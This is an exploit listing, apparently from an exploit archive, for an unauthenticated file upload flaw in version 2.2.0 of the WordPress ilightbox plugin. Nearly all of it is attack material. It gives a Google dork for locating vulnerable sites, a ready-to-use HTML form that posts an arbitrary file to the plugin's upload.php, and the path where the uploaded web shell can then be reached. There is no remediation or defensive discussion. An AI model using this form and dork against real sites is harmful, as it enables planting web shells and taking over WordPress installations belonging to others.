WordPress ilightbox Plugin File Upload Vulnerability

Exploit Title: WordPress Plugin ilightbox File Upload Vulnerability
Date : 2015-12-09
Vendor Homepage : http://www.ilightbox.net/
Version : 2.2.0
Google dork: inurl:/wp-content/plugins/ilightbox
===========================================

  
POC (Exploit code)
<form action="http://localhost/wordpress/wp-content/plugins/ilightbox/lib/upload.php" method="POST" enctype="multipart/form-data">
<input type="file" name="qqfile">
<input type="submit" value="Upload">
</form>

shell   http://localhost/wordpress/wp-content/uploads//2015/12/shell.name


#  0day.today [2018-04-09]  #